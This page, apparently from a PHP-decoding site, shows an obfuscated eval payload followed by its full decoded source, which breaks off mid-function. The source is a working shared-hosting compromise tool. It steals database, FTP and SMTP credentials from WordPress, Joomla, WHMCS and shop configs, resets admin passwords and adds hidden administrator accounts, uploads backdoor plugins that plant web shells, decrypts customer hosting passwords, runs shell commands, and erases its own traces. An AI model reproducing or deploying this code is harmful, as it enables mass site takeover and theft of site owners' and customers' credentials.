Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('FZfHDoPoFVNfJbtZxILelHFT9N47mxFgmum9PH0cWN5..
Decoded Output download
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
error_reporting(0);
//application ->off change with defines
$servpath = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$explode = explode('/',$servpath );
$server_na = $_SERVER['SERVER_NAME'];
$url = str_replace($explode[count($explode)-1],'',$servpath )."/inc";
$url2 = str_replace($explode[count($explode)-1],'',$servpath )."/fix";
$backdoorfilename = 'helo.zip';
$joomladoor = str_replace($explode[count($explode)-1],'',$servpath )."mod_hello_hell.zip";
$joomladoor2 = str_replace($explode[count($explode)-1],'',$servpath )."mod_hello_hell2.zip";
$mylogfile = 'dafuq.log';
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {
if(isset($_REQUEST['x'])){
update();
}
if(!file_exists($backdoorfilename)) {
die('No WP backdoor file!');
}
if(!file_exists('mod_hello_hell.zip')||!file_exists('mod_hello_hell2.zip')) {
die('No Joomla backdoor file!');
}
$html= file_get_contents($url2);
$dom = new DOMDocument();
@$dom->loadHTML($html);
$xPath = new DOMXPath($dom);
$elements = $xPath->query("//a/@href");
$tot = $elements->length-1;
echo '<br />'.php_uname().'<br />Total users directory: '.$tot.' <br /><br />';
WriteLog(php_uname()."
");
foreach ($elements as $e) {
if ($e->nodeValue != "/"){
$link = $e->nodeValue;
$url = explode("%7c", $link);
$user = $url[0];
$conf = $url[1];
$mine ="/".basename(__FILE__);
$explode = explode($mine,$servpath );
$cek = $explode[0].'/fix/'.$user."|".$conf;
$http_code = get_headers($cek);
if(stristr($http_code[0], '200 OK')){
echo '<br />[<font color="red">'.$user.'</font>]<br />';
$config = basic_curl($cek, 0, NULL);
if($password = getPass($cek)){
$konten = file_get_contents($cek);
if((stristr($conf, 'configuration.php'))&&(stristr($konten, "class JConfig") !== FALSE)){
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($cek);
$ftp_pass = getMiddleString($res, "ftp_pass = '", "';");
$smtp_pass = getMiddleString($res, "smtppass = '", "';");
$db_pass = str_replace("'", '', getMiddleString($res, '$password = ', ';'));
if(checkFTP($user, $ftp_pass) === TRUE){
foreach (cekDomain($user) as $domain){
//$http_codex = get_headers($domain);
//if(stristr($http_codex[0], '200 OK')){
echo '[<font color="red">WP</font>] <font color="blue">http://'.$domain.':2082|'.$user.'|'.$password.'</font><br />';
WriteLog('[WP] ['.$user.'] http://'.$domain.':2082|'.$user.'|'.$password."
");
//}
}
}else if(checkFTP($user, $smtp_pass) === TRUE){
foreach (cekDomain($user) as $domain){
//$http_codex = get_headers($domain);
//if(stristr($http_codex[0], '200 OK')){
echo '[<font color="red">WP</font>] <font color="blue">http://'.$domain.':2082|'.$user.'|'.$password.'</font><br />';
WriteLog('[WP] ['.$user.'] http://'.$domain.':2082|'.$user.'|'.$password."
");
//}
}
}else if(checkFTP($user, $db_pass) === TRUE){
foreach (cekDomain($user) as $domain){
//$http_codex = get_headers($domain);
//if(stristr($http_codex[0], '200 OK')){
echo '[<font color="red">WP</font>] <font color="blue">http://'.$domain.':2082|'.$user.'|'.$password.'</font><br />';
WriteLog('[WP] ['.$user.'] http://'.$domain.':2082|'.$user.'|'.$password."
");
//}
}
}
}else{
//echo $user." : ".$password."<br />";
if(checkFTP($user, $password) === TRUE){
foreach (cekDomain($user) as $domain){
echo '[<font color="red">WP</font>] <font color="blue">http://'.$domain.':2082|'.$user.'|'.$password.'</font><br />';
WriteLog('[WP] ['.$user.'] http://'.$domain.':2082|'.$user.'|'.$password."
");
}
}
}
unset($konten);
}else{
echo 'Fail to get password!<br />';
}
if((stristr($conf, 'wp-config.php')) && (stristr($config, 'wp-settings.php'))){
echo '-> <font color="green">WordPress Configuration file!!</font><br />';
FuckWP($cek, $user);
}elseif(stristr($conf, 'configuration.php')){
$konten = file_get_contents($cek);
if(stristr($konten, "cc_encryption_hash") !== FALSE) {
echo '-> <font color="green">WHMCS Configuration file!!</font><br />';
FuckWHMCS($cek);
}elseif(stristr($konten, "class JConfig") !== FALSE) {
echo '-> <font color="green">Joomla Configuration file!!</font><br />';
$ceks =$explode[0]."/inc/home/".$user."/public_html/".$conf;
FuckJoomla($cek, $ceks, $user);
}elseif(stristr($konten, "mosConfig") !== FALSE) {
echo '-> <font color="green">Mambo Configuration file!!</font><br />';
FuckMambo($cek);
}else{
echo '-> <font color="red">No pattern match known CMS</font><br />';
}
unset($konten);
}elseif(stristr($conf, 'config.php')){
$konten = file_get_contents($cek);
if(stristr($konten, "PHPBB_INSTALLED") !== FALSE) {
echo '-> <font color="green">phpBB Configuration file!!</font><br />';
}elseif(stristr($konten, "vBulletin") !== FALSE && stristr($konten, "config['MasterServer']['username']")) {
echo '-> <font color="green">vBulletin Configuration file!!</font><br />';
FuckvBulletin($cek);
}elseif(stristr($konten, "CMS Made Simple") !== FALSE) {
echo '-> <font color="green">CMS Made Simple Configuration file!!</font><br />';
FuckCMSMS($cek);
}else{
echo '-> <font color="red">No pattern match known CMS</font><br />';
}
unset($konten);
}elseif(stristr($conf, 'configure.php')){
$konten = file_get_contents($cek);
if(stristr($konten, "zen-cart.com") !== FALSE) {
echo '-> <font color="green">Zen Cart Configuration file!!</font><br />';
FuckZenCart($cek);
}elseif(stristr($konten, "oscommerce.com") !== FALSE) {
echo '-> <font color="green">osCommerce Configuration file!!</font><br />';
FuckOsCommerce($cek);
}else{
echo '-> <font color="red">No pattern match known CMS</font><br />';
}
unset($konten);
}else{
echo '-> <font color="red">No pattern match known CMS</font><br />';
}
flush();
}else{
sleep(3);
continue;
}
flush();
}
}
echo '<br /><br /><font color="blue">---- F . I . N . I . S . H ----</font>';
WriteLog("FINISH...");
}else{
update();
}
class cURL {
private $socks = '';
private $c = '';
private $agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6';
public function __construct($cookie = 'cookie.txt', $socks = ''){
if (trim($socks) != '') {
$this->socks = $socks;
}
$this->c = $cookie;
}
private function doRequest($method, $url, $vars) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $this->agent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->c);
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->c);
if (trim($this->socks) != '') {
curl_setopt($ch, CURLOPT_PROXY, $this->socks);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
}
$data = curl_exec($ch);
$curlInfo = curl_getinfo($ch);
curl_close($ch);
if ($data) {
return str_replace(' ', '', $data);
} else {
return false;
}
}
public function get($url, $ref = '') {
return $this->doRequest('GET', $url, 'NULL');
}
public function post($url, $vars, $ref = '') {
return $this->doRequest('POST', $url, $vars);
}
}
function mid_str($start,$end,$string) {
$exp = explode($start,$string);
$data = explode($end,$exp[1]);
return $data[0];
}
function cleanString($str) {
return str_replace(array("
", " ", "
"), "", $str);
}
function clean($str) {
$str = trim($str);
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
return mysql_real_escape_string($str);
}
function WriteLog($string)
{
global $mylogfile;
$fh = fopen($mylogfile, 'a+');
fwrite($fh, $string);
fclose($fh);
}
function getMiddleString($source_string, $string_start, $string_end) {
if(strpos($source_string, $string_start) === FALSE) return FALSE;
if(strpos($source_string, $string_end) === FALSE) return FALSE;
$start = strpos($source_string, $string_start) + strlen($string_start);
$end = strpos($source_string, $string_end, $start);
$return = substr($source_string, $start, $end - $start);
return $return;
}
function FuckWP($configfile, $servuser)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($configfile);
$pass_admin = '$P$BhP0q4Dz3eKhbbJArDZSFkilj157zj.';
$pass_add = '$P$BsRCsD3Al/6/CMcl7Tnv1uKlUMRvKE0';
$db_user = getMiddleString($res, "define('DB_USER', '", "');");
$db_name = getMiddleString($res, "define('DB_NAME', '", "');");
$db_pass = getMiddleString($res, "define('DB_PASSWORD', '", "');");
$db_host = getMiddleString($res, "define('DB_HOST', '", "');");
$table_prefix = getMiddleString($res, "table_prefix = '", "';");
$wp_user = '';
$wp_pass = '';
if($db_host !== FALSE && $db_user !== FALSE && $db_pass !== FALSE && $db_name !== FALSE) {
echo $db_user." : ";
echo $db_pass." > ";
echo $db_name." @ ";
echo $db_host." -> ";
$link = @mysql_connect($db_host, $db_user, $db_pass);
if(!$link) {
echo '[<font color="red">!</font>] Can\'t connect to database!<br />';
} else {
$db = @mysql_select_db($db_name, $link);
if(!$db) {
echo '[<font color="red">!</font>] Can\'t select database!<br />';
} else {
$qs = @mysql_query("SELECT * FROM `".$table_prefix."options` WHERE `option_name`='siteurl'");
while($rows = mysql_fetch_assoc($qs)) {
$site = $rows['option_value'];
}
$http_codez = get_headers($site);
if(stristr($http_codez[0], '200 OK')){
$qz = @mysql_query("SELECT * FROM `".$table_prefix."users` WHERE `ID`='1'");
while($rows = @mysql_fetch_assoc($qz)) {
$wp_user = $rows['user_login'];
$wp_pass = $rows['user_pass'];
}
if(trim($wp_user) != '' && trim($wp_pass) != '') {
@mysql_query("UPDATE `".$table_prefix."users` SET `user_pass`='".clean($pass_admin)."' WHERE `ID`='1' AND `user_login`='$wp_user'");
@mysql_query("INSERT INTO `".$table_prefix."users` (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES ('-', '".clean($pass_add)."', '-', 'info@".clean($server_na)."', '2011-06-07 00:00:00', '0', '-')");
@mysql_query("INSERT INTO `".$table_prefix."usermeta` (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, LAST_INSERT_ID(), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')");
@mysql_query("INSERT INTO `".$table_prefix."usermeta` (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, LAST_INSERT_ID(), 'wp_user_level', '10')");
FuckingUpload($servuser, $wp_user, "admin", $site."/wp-admin/");
@mysql_query("UPDATE `".$table_prefix."users` SET `user_pass`='".clean($wp_pass)."' WHERE `ID`='1' AND `user_login`='$wp_user'");
}
}else{
echo '<br />[<font color="red">!</font>] '. $site .' Modyaar..!<br />';
}
}
@mysql_close($link);
}
}
}
function FuckingUpload($servuser, $user, $pass, $adminurl){
global $backdoorfilename;
// echo 'Trying to upload now...<br />';
// echo $servuser.' - '.$user.' - '.$pass.' - '.$adminurl.'<br />';
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$redr = $adminurl.'plugin-install.php?tab=upload';
$postdata = "log=$user&pwd=$pass&wp-submit=Log%20In&redirect_to=$redr";
$logs = str_replace('wp-admin/', 'wp-login.php', $adminurl);
$a = new cURL();
$b = $a->post($logs, $postdata, $logs);
if(!stristr($b, 'update.php?action=upload-plugin')) {
echo '[<font color="red">!</font>] Login failed!<br />';
} else {
echo "Login sukses<br />";
$update_url = 'update.php?action=upload-plugin';
$nonce = mid_str('<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />', $b);
$reurl = mid_str('<input type="hidden" name="_wp_http_referer" value="', '" />', $b);
$submt = mid_str('<input type="submit" class="button" value="', '" />', $b);
$data['_wpnonce'] = $nonce;
$data['_wp_http_referer'] = $reurl;
$data['pluginzip'] = '@'.realpath('./'.$backdoorfilename);
$data['submit'] = $submt;
$upload = $a->post($adminurl.$update_url, $data, $adminurl.'plugin-install.php?tab=upload');
if($backdoorfilename == 'helo.zip') {
$helodir = array('helo', 'helo1', 'helo2', 'helo3');
$found = FALSE;
$i = 0;
$z = count($helodir);
while(!$found && $i < $z)
{
$url = str_replace('wp-admin/', 'wp-content/plugins/'.$helodir[$i].'/helo.php', $adminurl);
$cek = $a->get($url);
if(stristr($cek, 'Sukses'))
{
echo '[<font color="blue">SH</font>] ';
$shurl = str_replace('wp-content/plugins/'.$helodir[$i].'/helo.php', 'wp-apps.php', $url);
echo '<font color="blue"><a href="'.$shurl.'" target="_blank">'.$shurl.'</a><br /></font>';
WriteLog('[SH] [W] ['.$servuser.'] '.$shurl."
");
$found = TRUE;
} else {
echo '[<font color="red">!</font>] '.$url.'<br />';
++$i;
}
}
} elseif($backdoorfilename == 'cpar.zip')
{
$activation = getMiddleString($upload, 'plugins.php?action=activate', '" title="');
$activation = 'plugins.php?action=activate'.str_replace('amp;', '', $activation);
$activate = $a->get($adminurl.$activation);
// echo '<textarea rows="50" cols="80">'.htmlentities($activate).'</textarea>';
if(stristr($activate, 'plugins.php?action=deactivate&plugin=cpar') || stristr($activate, 'plugins.php?action=deactivate&plugin=cpar'))
{
echo '<br />[<font color="blue">@</font>] '.str_replace('wp-admin/', '', $adminurl).' - <font color="blue">Plugin activated!</font>';
} else {
echo '<br />[<font color="red">!</font>] '.str_replace('wp-admin/', '', $adminurl).' - <font color="red">Plugin activation failed!</font>';
}
}
}
}
function update(){
$files = array(__FILE__, $mylogfile, 'error_log', 'cookie.txt', $backdoorfilename, 'mod_hello_hell.zip', 'mod_hello_hell2.zip','update.tar');
echo '<pre>';
foreach($files as $file)
{
if(file_exists($file))
{
if(is_dir($file))
{
ex("rm $file -rf");
} else {
@unlink($file);
}
echo '[!] '.$file.' - <font color="red">Removed</font><br />';
} else {
echo '[!] '.$file.' - <font color="red">Already removed</font><br />';
}
}
echo '</pre>';
exit;
}
function FuckJoomla($cukfile, $configfile, $servuser){
global $joomladoor, $nameds, $joomladoor2;
$pass_admin = '9c3d59a418d4a9b460231a744a307cf9:Tx637Gdb2aCBHrzvFveuG9DX0QRg0hpe';
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($cukfile);
$smtp_scur = getMiddleString($res, "smtpsecure = '", "';");
$smtp_port = getMiddleString($res, "smtpport = '", "';");
$smtp_user = getMiddleString($res, "smtpuser = '", "';");
$smtp_pass = getMiddleString($res, "smtppass = '", "';");
$smtp_host = getMiddleString($res, "smtphost = '", "';");
if($smtp_host !== FALSE && $smtp_user !== FALSE && $smtp_pass !== FALSE && trim($smtp_host) != '' && trim($smtp_user) != '' && trim($smtp_pass) != ''){
echo '[<font color="blue">SMTP</font>] '.$smtp_host.(($smtp_port) ? ':'.$smtp_port : '').' '.$smtp_user.'|'.$smtp_pass.(($smtp_scur) ? ' -> '.$smtp_scur : '')."<br />";
WriteLog('[SMTP] '.$smtp_host.(($smtp_port) ? ':'.$smtp_port : '').' '.$smtp_user.'|'.$smtp_pass.(($smtp_scur) ? ' -> '.$smtp_scur : '')."
");
}
$db_host = str_replace("'", '', getMiddleString($res, '$host = ', ';'));
$db_user = str_replace("'", '', getMiddleString($res, '$user = ', ';'));
$db_name = str_replace("'", '', getMiddleString($res, '$db = ', ';'));
$db_pass = str_replace("'", '', getMiddleString($res, '$password = ', ';'));
$db_pref = str_replace("'", '', getMiddleString($res, '$dbprefix = ', ';'));
$live_site = str_replace("'", '', getMiddleString($res, '$live_site = ', ';'));
if($db_host !== FALSE && $db_user !== FALSE && $db_pass !== FALSE && $db_name !== FALSE && trim($db_host) != '' && trim($db_user) != '' && trim($db_pass) != '' && trim($db_name) != '') {
echo $db_user." : ";
echo $db_pass." > ";
echo $db_name." @ ";
echo $db_host." -> ";
$link = @mysql_connect($db_host, $db_user, $db_pass);
if(!$link) {
echo '[<font color="red">!</font>] Can\'t connect to database!<br />';
}else{
$db = @mysql_select_db($db_name, $link);
if(!$db) {
echo '[<font color="red">!</font>] Can\'t select database!<br />';
}else{
$ngerti = FALSE;
$tipe_user = @mysql_query("SELECT * FROM `".$db_pref."users` WHERE `usertype` = 'Super Administrator' LIMIT 0,1");
$tipe_user2 = @mysql_query("SELECT * FROM `".$db_pref."users` WHERE `usertype` = 'deprecated' LIMIT 0,1");
$queryx = @mysql_query("SELECT * FROM `".$db_pref."core_acl_aro`");
if(!$queryx){
$versi_joomla = "new";
@mysql_query("INSERT INTO `".$db_pref."users` (username, password) VALUES ('-', '71a4d4cd2f30b185d707718273b17d05')");
@mysql_query("INSERT INTO `".$db_pref."user_usergroup_map` VALUES (LAST_INSERT_ID(),'8')");
}else{
$versi_joomla = "old";
@mysql_query("INSERT INTO `".$db_pref."users` (name,username,password,usertype,gid) VALUES ('-','-','71a4d4cd2f30b185d707718273b17d05','Super Administrator','25')");
@mysql_query("INSERT INTO `".$db_pref."core_acl_aro` (section_value,value,name) VALUES ('users',LAST_INSERT_ID(),'-')");
@mysql_query("INSERT INTO `".$db_pref."core_acl_groups_aro_map` (group_id,aro_id) VALUES ('25',LAST_INSERT_ID())");
}
if(mysql_num_rows($tipe_user) > 0){
$user_type = 'Super Administrator';
$ngerti = TRUE;
}
if($ngerti === FALSE && mysql_num_rows($tipe_user2) > 0){
$tipe_user = @mysql_query("SELECT * FROM `".$db_pref."users` WHERE `usertype` = 'deprecated' LIMIT 0,1");
$user_type = 'deprecated';
$ngerti = TRUE;
}
if($ngerti === TRUE){
$getjoomlauser = @mysql_query("SELECT * FROM `".$db_pref."users` WHERE `usertype` = '$user_type' LIMIT 0,1");
while($rows = mysql_fetch_assoc($getjoomlauser)){
$jom_user = $rows['username'];
$jom_pass = $rows['password'];
}
@mysql_query("UPDATE `".$db_pref."users` SET `password`='".clean($pass_admin)."' WHERE `usertype` = '$user_type' AND `username`='$jom_user'");
if(trim($jom_user) != '' && trim($jom_pass) != ''){
foreach (cekDomain($servuser) as $cux){
$admin_url = "http://".$cux."/administrator/index.php";
$a = new cURL();
$b = $a->get($admin_url);
//$versi_joomla = CekVersiJoomla($b);
if($versi_joomla !== FALSE){
$postdata['username'] = $jom_user;
$postdata['passwd'] = 'admin';
$postdata['lang'] = '';
$postdata['option'] = 'com_login';
$postdata['task'] = 'login';
preg_match('#<input type="hidden" name="([a-zA-Z0-9]{32})" value="1" />#', $b, $m);
$postdata[$m[1]] = '1';
if($versi_joomla == 'new') {
$postdata['return'] = getMiddleString($b, '<input type="hidden" name="return" value="', '" />');
$postdata['submit'] = urlencode('Log in');
}else{
$postdata['submit'] = 'Login';
}
$res = $a->post($admin_url, $postdata);
if(stristr($res, 'task=logout')){
echo "Login sukses <br />";
unset($postdata[$m[1]]);
$res = $a->get($admin_url.'?option=com_installer');
// Install Module
if($versi_joomla == 'old'){
$postdata['install_url'] = $joomladoor2;
}else{
$postdata['install_url'] = $joomladoor;
}
$postdata['type'] = '';
$postdata['installtype'] = 'url';
$postdata['option'] = 'com_installer';
if($versi_joomla == 'new'){
$postdata['task'] = 'install.install';
//echo $versi_joomla." proses install<br />";
}else{
$postdata['task'] = 'doInstall';
//echo $versi_joomla." proses install<br />";
}
preg_match('#<input type="hidden" name="([a-zA-Z0-9]{32})" value="1" />#', $res, $m);
$postdata[$m[1]] = '1';
$res = $a->post($admin_url, $postdata);
if(stristr($res, 'Provides a basic')){
//echo "Install module sukses, write backdoor to root dir<br />";
$myurl = str_replace('administrator/index.php', 'modules/mod_hello_hell/mod_hello_hell.php', $admin_url);
$res = $a->get($myurl);
//echo $myurl.'<br />';
if(stristr($res, 'Sukses')){
$res = $a->get('http://'.$cux.'/defined.php');
if(stristr($res, 'password')){
echo '[<font color="blue">SH</font>]<font color="blue"> <a href="http://'.$cux.'/defined.php" target="_blank"> http://'.$cux.'/defined.php</a></font><br />';
echo '[<font color="blue">Admin</font>]<font color="blue"> <a href="'.$admin_url.'" target="_blank"> '.$admin_url.'</a></font> -> username : - password : jancok<br />';
WriteLog('[SH] [J] ['.$servuser.'] http://'.$cux."/defined.php
");
}else{
echo '[<font color="red">!</font>] Direct Access to modules is not allowed!<br />';
echo '[<font color="blue">Admin</font>]<font color="blue"> <a href="'.$admin_url.'" target="_blank"> '.$admin_url.'</a></font> -> username : - password : jancok<br />';
}
}else{
echo '[<font color="red">!</font>] Failed to plant backdoor!<br />';
echo '[<font color="blue">Admin</font>]<font color="blue"> <a href="'.$admin_url.'" target="_blank"> '.$admin_url.'</a></font> -> username : - password : jancok<br />';
}
}else{
echo '[<font color="red">!</font>] Failed to install module!<br />';
echo '[<font color="blue">Admin</font>]<font color="blue"> <a href="'.$admin_url.'" target="_blank"> '.$admin_url.'</a></font> -> username : - password : jancok<br />';
}
return false;
}else{
echo '[<font color="red">!</font>] Login failed!<br />';
}
}else{
echo '[<font color="red">!</font>] Unable to get Joomla version!: '.$admin_url."<br />";
}
}
@mysql_query("UPDATE `".$db_pref."users` SET `password`='".clean($jom_pass)."' WHERE `usertype` = '$user_type' AND `username`='$jom_user'");
}
} else {
echo '[<font color="red">!</font>] Failed to get username and default password!<br />';
}
}
@mysql_close($link);
}
} else {
//echo 'Can\'t get database details!';
}
}
function FuckWHMCS($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($configfile);
$db_host = str_replace("'", '', getMiddleString($res, '$db_host = ', ';'));
$db_username = str_replace("'", '', getMiddleString($res, '$db_username = ', ';'));
$db_password = str_replace("'", '', getMiddleString($res, '$db_password = ', ';'));
$db_name = str_replace("'", '', getMiddleString($res, '$db_name = ', ';'));
$cc_encryption_hash = str_replace("'", '', getMiddleString($res, '$cc_encryption_hash = ', ';'));
$customadminpath = str_replace("'", '', getMiddleString($res, '$customadminpath = ', ';'));
$link = @mysql_connect($db_host, $db_username, $db_password);
echo $db_username." : ".$db_password." > ".$db_name." @ ".$db_host." > ".$cc_encryption_hash." > ".$customadminpath." -> ";
if(!$link) {
echo '[<font color="red">!</font>] Can\'t connect to database!<br />';
} else {
$db = @mysql_select_db($db_name, $link);
if(!$db) {
echo '[<font color="red">!</font>] Can\'t select database!<br />';
} else {
$hostingcount = @mysql_query("SELECT * FROM `tblhosting` WHERE `domainstatus`='Active'");
echo '[<font color="blue">@</font>] Has <font color="blue">'.mysql_num_rows($hostingcount).'</font> record(s) in `tblhosting`<br />';
while($row = mysql_fetch_array($hostingcount)){
$piss=$row['password'];
$pus = decrypt($piss,$cc_encryption_hash);
if (($row['domain']!="")&&($row['username']!="")&&($pus!="")){
echo "http://".$row['domain'] . ":2082|" . $row['username']. "|" . $pus;
echo "<br />";
}
}
}
@mysql_close($link);
}
}
function FuckMambo($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($configfile);
$mosConfig_user = str_replace("'", '', getMiddleString($res, '$mosConfig_user = ', ';'));
$mosConfig_password = str_replace("'", '', getMiddleString($res, '$mosConfig_password = ', ';'));
$mosConfig_db = str_replace("'", '', getMiddleString($res, '$mosConfig_db = ', ';'));
$mosConfig_host = str_replace("'", '', getMiddleString($res, '$mosConfig_host = ', ';'));
echo $mosConfig_user." : ".$mosConfig_password." > ".$mosConfig_db." @ ".$mosConfig_host." -> ";
echo "<br />";
}
function FuckCMSMS($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($configfile);
$mosConfig_user = str_replace("'", '', getMiddleString($res, '$config[\'db_username\'] = ', ';'));
$mosConfig_password = str_replace("'", '', getMiddleString($res, '$config[\'db_password\'] = ', ';'));
$mosConfig_db = str_replace("'", '', getMiddleString($res, '$config[\'db_name\'] = ', ';'));
$mosConfig_host = str_replace("'", '', getMiddleString($res, '$config[\'db_hostname\'] = ', ';'));
echo $mosConfig_user." : ".$mosConfig_password." > ".$mosConfig_db." @ ".$mosConfig_host." -> ";
echo "<br />";
}
function FuckZenCart($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = ex("cat $configfile");
$site_ad = getMiddleString($res, "define('HTTP_SERVER', '", "');");
$db_pref = getMiddleString($res, "define('DB_PREFIX', '", "');");
$db_host = getMiddleString($res, "define('DB_SERVER', '", "');");
$db_user = getMiddleString($res, "define('DB_SERVER_USERNAME', '", "');");
$db_pass = getMiddleString($res, "define('DB_SERVER_PASSWORD', '", "');");
$db_name = getMiddleString($res, "define('DB_DATABASE', '", "');");
if($db_host !== FALSE && $db_user !== FALSE && $db_pass !== FALSE && $db_name !== FALSE) {
$link = @mysql_connect($db_host, $db_user, $db_pass);
echo $site_ad ." => ".$db_user." : ".$db_pass." > ".$db_name." @ ".$db_host." -> ";
if(!$link) {
echo '[<font color="red">!</font>] Can\'t connect to database!<br />';
} else {
$db = @mysql_select_db($db_name, $link);
if(!$db) {
echo '[<font color="red">!</font>] Can\'t select database!<br />';
} else {
$customers = @mysql_query("SELECT * FROM `".(($db_pref) ? $db_pref : '')."customers`");
$orders = @mysql_query("SELECT * FROM `".(($db_pref) ? $db_pref : '')."orders`");
echo '[<font color="blue">@</font>] <font color="blue">'.$site_ad.'</font> has <font color="blue">'.mysql_num_rows($customers).'</font> record(s) in `'.(($db_pref) ? $db_pref : '').'customers` table and <font color="blue">'.mysql_num_rows($orders).'</font> record(s) in `'.(($db_pref) ? $db_pref : '').'orders` table <br />';
}
@mysql_close($link);
}
}
}
function FuckOsCommerce($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = ex("cat $configfile");
$site_ad = getMiddleString($res, "define('HTTP_SERVER', '", "');");
$db_host = getMiddleString($res, "define('DB_SERVER', '", "');");
$db_user = getMiddleString($res, "define('DB_SERVER_USERNAME', '", "');");
$db_pass = getMiddleString($res, "define('DB_SERVER_PASSWORD', '", "');");
$db_name = getMiddleString($res, "define('DB_DATABASE', '", "');");
if($db_host !== FALSE && $db_user !== FALSE && $db_pass !== FALSE && $db_name !== FALSE) {
$link = @mysql_connect($db_host, $db_user, $db_pass);
echo $site_ad ." => ".$db_user." : ".$db_pass." > ".$db_name." @ ".$db_host." -> ";
if(!$link) {
echo '[<font color="red">!</font>] Can\'t connect to database!<br />';
} else {
echo '[<font color="blue">!</font>] Connected to database!<br />';
@mysql_close($link);
}
}
}
function FuckvBulletin($configfile)
{
}
function FuckPUNBB($configfile)
{
if(file_exists('cookie.txt')) @unlink('cookie.txt');
$res = basic_curl($configfile);
$db_host = str_replace("'", '', getMiddleString($res, '$db_host = ', ';'));
$db_username = str_replace("'", '', getMiddleString($res, '$db_username = ', ';'));
$db_password = str_replace("'", '', getMiddleString($res, '$db_password = ', ';'));
$db_name = str_replace("'", '', getMiddleString($res, '$db_name = ', ';'));
$link = @mysql_connect($db_host, $db_username, $db_password);
echo $db_username." : ".$db_password." > ".$db_name." @ ".$db_host." -> <br />";
}
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("
",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function basic_curl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6');
$response = curl_exec($ch);
if(trim($response) != '') {
return $response;
}
return FALSE;
}
function getPass($configFile)
{
$config = basic_curl($configFile, 0, NULL);
$config = explode("
", $config);
$lines = count($config);
for($x=0;$x<$lines;$x++)
{
if((preg_match("#pass(.*?), (.*?)'(.+?)'\);#i", $config[$x], $nemu)) || (preg_match("#pass(.*?), (.*?)\"(.+?)\"\);#i", $config[$x], $nemu)) || (preg_match("#pass(.*?)=(.*?)'(.+?)';#i", $config[$x], $nemu)) || (preg_match("#pass(.*?)=(.*?)\"(.+?)\";#i", $config[$x], $nemu)) || (preg_match("#pwd(.*?)=(.*?)'(.+?)';#i", $config[$x], $nemu)) || (preg_match("#ftp_pass(.*?)=(.*?)'(.+?)';#i", $config[$x], $nemu)) || (preg_match("#smtppass(.*?)=(.*?)'(.+?)';#i", $config[$x], $nemu)) || (preg_match("#pwd(.*?)=(.*?)\"(.+?)\";#i", $config[$x], $nemu)) || (preg_match("#<password><!\[CDATA\[(.*?)\]\]></password>#i", $config[$x], $nemu)) )
{
if(($nemu[3] != '') && (!preg_match("# #", $nemu[3])) && (!preg_match("#'#", $nemu[3])) && (!preg_match("#\"#", $nemu[3])))
{
return $nemu[3];
}
}
}
return FALSE;
}
function ReadNamed()
{
$ret = array();
$foundDomain = array();
$named = ex('cat /etc/named.conf');
if(preg_match_all("#(.*?)zone \"(.*?)\"#", $named, $nemu)) {
foreach($nemu[2] as $domain) {
if(!in_array($domain, $foundDomain))
{
$user = cleanString(ex("stat -c %U /etc/valiases/$domain"));
$ret[$user][] = $domain;
array_push($foundDomain, $domain);
}
}
return $ret;
}
return FALSE;
}
function cekDomain($user){
$domz = array();
if(is_readable("/var/named")){
